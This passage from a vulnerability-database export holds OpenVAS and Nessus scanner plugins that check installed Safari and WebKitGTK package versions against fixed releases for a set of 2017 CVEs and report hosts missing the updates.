\"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.811251\");\n script_version(\"2019-07-05T08:56:43+0000\");\n script_cve_id(\"CVE-2017-7060\", \"CVE-2017-7006\", \"CVE-2017-7011\", \"CVE-2017-7018\",\n \"CVE-2017-7020\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\",\n \"CVE-2017-7039\", \"CVE-2017-7040\", \"CVE-2017-7041\", \"CVE-2017-7042\",\n \"CVE-2017-7043\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7038\",\n \"CVE-2017-7059\", \"CVE-2017-7049\", \"CVE-2017-7064\", \"CVE-2017-7019\",\n \"CVE-2017-7012\");\n script_bugtraq_id(99887, 99886, 99885, 99888, 99890);\n script_tag(name:\"cvss_base\", 
value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 08:56:43 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-07-20 11:35:58 +0530 (Thu, 20 Jul 2017)\");\n script_name(\"Apple Safari Multiple Vulnerabilities-HT207921\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An error in the processing of print dialogs in Printing module.\n\n - An error in painting the cross-origin buffer into the frame in Webkit module.\n\n - A state management issue due to error in frame handling.\n\n - Multiple memory corruption issues in WebKit module.\n\n - A logic issue existed in the handling of DOMParser in WebKit module.\n\n - A memory initialization issue in WebKit module.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote\n attackers to conduct cross site scripting and address bar spoofing attacks,\n allow cross-origin data to be exfiltrated by using SVG filters to conduct a\n timing side-channel attack, arbitrary code execution, read restricted memory\n and put browser into an infinite number of print dialogs making users believe\n their browser was locked.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 10.1.2\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 10.1.2 or later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT207921\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n 
script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!safVer = get_app_version(cpe:CPE)){\n exit(0);\n}\n\nif(version_is_less(version:safVer, test_version:\"10.1.2\"))\n{\n report = report_fixed_ver(installed_version:safVer, fixed_version:\"10.1.2\");\n security_message(data:report);\n exit(0);\n}", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:27:43", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2369", "CVE-2017-7034", "CVE-2017-7064", "CVE-2017-2355", "CVE-2017-7056", "CVE-2016-7599", "CVE-2017-7055", "CVE-2016-7654", "CVE-2017-2539", "CVE-2017-2363", "CVE-2016-7623", "CVE-2016-7645", "CVE-2017-2366", "CVE-2016-7589", "CVE-2016-7586", "CVE-2017-2538", "CVE-2017-2365", "CVE-2017-7037", "CVE-2017-7018", "CVE-2016-7641", "CVE-2016-7635", "CVE-2017-7061", "CVE-2017-2371", "CVE-2016-7652", "CVE-2017-7048", "CVE-2016-7632", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-2496", "CVE-2017-2364", "CVE-2017-2350", "CVE-2017-2373", "CVE-2017-2356", "CVE-2016-7639", "CVE-2016-7592", "CVE-2016-7656", "CVE-2017-2510", "CVE-2017-2362", "CVE-2017-7030", "CVE-2017-2354"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2017-11-11T00:00:00", "id": "OPENVAS:1361412562310851645", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310851645", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2017:2991-1)", "sourceData": "# Copyright (C) 2017 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public 
License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.851645\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2017-11-11 07:31:25 +0100 (Sat, 11 Nov 2017)\");\n script_cve_id(\"CVE-2016-7586\", \"CVE-2016-7589\", \"CVE-2016-7592\", \"CVE-2016-7599\",\n \"CVE-2016-7623\", \"CVE-2016-7632\", \"CVE-2016-7635\", \"CVE-2016-7639\",\n \"CVE-2016-7641\", \"CVE-2016-7645\", \"CVE-2016-7652\", \"CVE-2016-7654\",\n \"CVE-2016-7656\", \"CVE-2017-2350\", \"CVE-2017-2354\", \"CVE-2017-2355\",\n \"CVE-2017-2356\", \"CVE-2017-2362\", \"CVE-2017-2363\", \"CVE-2017-2364\",\n \"CVE-2017-2365\", \"CVE-2017-2366\", \"CVE-2017-2369\", \"CVE-2017-2371\",\n \"CVE-2017-2373\", \"CVE-2017-2496\", \"CVE-2017-2510\", \"CVE-2017-2538\",\n \"CVE-2017-2539\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\",\n \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\",\n \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2017:2991-1)\");\n\n script_tag(name:\"summary\", 
value:\"The remote host is missing an update for the 'webkit2gtk3'\n package(s) announced via the referenced advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"This update for webkit2gtk3 to version 2.18.0 fixes the following issues:\n\n These security issues were fixed:\n\n - CVE-2017-7039: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7018: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7030: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7037: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7034: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7055: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7056: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7064: An issue was fixed that allowed remote attackers to\n bypass intended memory-read restrictions via a crafted app 
(bsc#1050469).\n\n - CVE-2017-7061: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7048: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-7046: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1050469).\n\n - CVE-2017-2538: An issue was fixed that allowed remote attackers to\n execute arbitrary code or cause a denial of service (memory corruption\n and application crash) via a crafted web site (bsc#1045460)\n\n - CVE-2017-2496: An issue was fixed that allowed remote attackers to\n ...\n\n Description truncated, please see the referenced URL(s) for more information.\");\n\n script_tag(name:\"affected\", value:\"webkit2gtk3 on openSUSE Leap 42.3, openSUSE Leap 42.2\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_xref(name:\"openSUSE-SU\", value:\"2017:2991-1\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSELeap42\\.2|openSUSELeap42\\.3)\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSELeap42.2\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.18.0~2.3.1\", 
rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", 
rpm:\"webkit2gtk3-devel~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.18.0~2.3.1\", rls:\"openSUSELeap42.2\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSELeap42.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18\", rpm:\"libjavascriptcoregtk-4_0-18~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37\", rpm:\"libwebkit2gtk-4_0-37~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n 
report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo\", rpm:\"libwebkit2gtk-4_0-37-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-JavaScriptCore-4_0\", rpm:\"typelib-1_0-JavaScriptCore-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2-4_0\", rpm:\"typelib-1_0-WebKit2-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"typelib-1_0-WebKit2WebExtension-4_0\", rpm:\"typelib-1_0-WebKit2WebExtension-4_0~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4\", rpm:\"webkit-jsc-4~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit-jsc-4-debuginfo\", rpm:\"webkit-jsc-4-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles\", rpm:\"webkit2gtk-4_0-injected-bundles~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk-4_0-injected-bundles-debuginfo\", rpm:\"webkit2gtk-4_0-injected-bundles-debuginfo~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-debugsource\", rpm:\"webkit2gtk3-debugsource~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-devel\", rpm:\"webkit2gtk3-devel~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2\", rpm:\"webkit2gtk3-plugin-process-gtk2~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"webkit2gtk3-plugin-process-gtk2-debuginfo\", rpm:\"webkit2gtk3-plugin-process-gtk2-debuginfo~2.18.0~5.1\", 
rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit\", rpm:\"libjavascriptcoregtk-4_0-18-debuginfo-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-32bit\", rpm:\"libwebkit2gtk-4_0-37-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk-4_0-37-debuginfo-32bit\", rpm:\"libwebkit2gtk-4_0-37-debuginfo-32bit~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"libwebkit2gtk3-lang\", rpm:\"libwebkit2gtk3-lang~2.18.0~5.1\", rls:\"openSUSELeap42.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:38", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2538"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-26T00:00:00", "id": "OPENVAS:1361412562310872922", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872922", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_fedora_2017_37f68e3534_webkitgtk4_fc24.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can 
redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872922\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-26 07:34:03 +0200 (Wed, 26 Jul 2017)\");\n script_cve_id(\"CVE-2017-2538\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-37f68e3534\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-37f68e3534\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/P5AUAAZXVI23QXJJOKWGDJE4V37RRORR\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.5~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:08", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-2538"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2017-07-14T00:00:00", "id": "OPENVAS:1361412562310872844", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872844", "type": "openvas", "title": "Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872844\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-07-14 15:54:58 +0530 (Fri, 14 Jul 2017)\");\n script_cve_id(\"CVE-2017-2538\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2017-bff1b87765\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2017-bff1b87765\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/2BF3P4WVYUK7QE6ISXAIFFINGK7JFSPV\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.16.5~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-02-01T07:23:20", "description": "A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 28, "cvss3": {"score": 8.8, "vector": "AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2017-08-03T00:00:00", "title": "Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-7034", "CVE-2017-7064", "CVE-2017-7056", "CVE-2017-7055", "CVE-2017-2538", "CVE-2017-7037", "CVE-2017-7018", "CVE-2017-7052", "CVE-2017-7061", "CVE-2017-7048", "CVE-2017-7039", "CVE-2017-7046", "CVE-2017-7030"], "modified": "2021-02-02T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:libwebkit2gtk-4.0-37", "p-cpe:/a:canonical:ubuntu_linux:libjavascriptcoregtk-4.0-18", "cpe:/o:canonical:ubuntu_linux:17.04", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3376-1.NASL", "href": "https://www.tenable.com/plugins/nessus/102161", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive 
text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3376-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(102161);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/18 12:31:47\");\n\n script_cve_id(\"CVE-2017-2538\", \"CVE-2017-7018\", \"CVE-2017-7030\", \"CVE-2017-7034\", \"CVE-2017-7037\", \"CVE-2017-7039\", \"CVE-2017-7046\", \"CVE-2017-7048\", \"CVE-2017-7052\", \"CVE-2017-7055\", \"CVE-2017-7056\", \"CVE-2017-7061\", \"CVE-2017-7064\");\n script_xref(name:\"USN\", value:\"3376-1\");\n\n script_name(english:\"Ubuntu 16.04 LTS / 17.04 : webkit2gtk vulnerabilities (USN-3376-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A large number of security issues were discovered in the WebKitGTK+\nWeb and JavaScript engines. If a user were tricked into viewing a\nmalicious website, a remote attacker could exploit a variety of issues\nrelated to web browser security, including cross-site scripting\nattacks, denial of service attacks, and arbitrary code execution.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. 
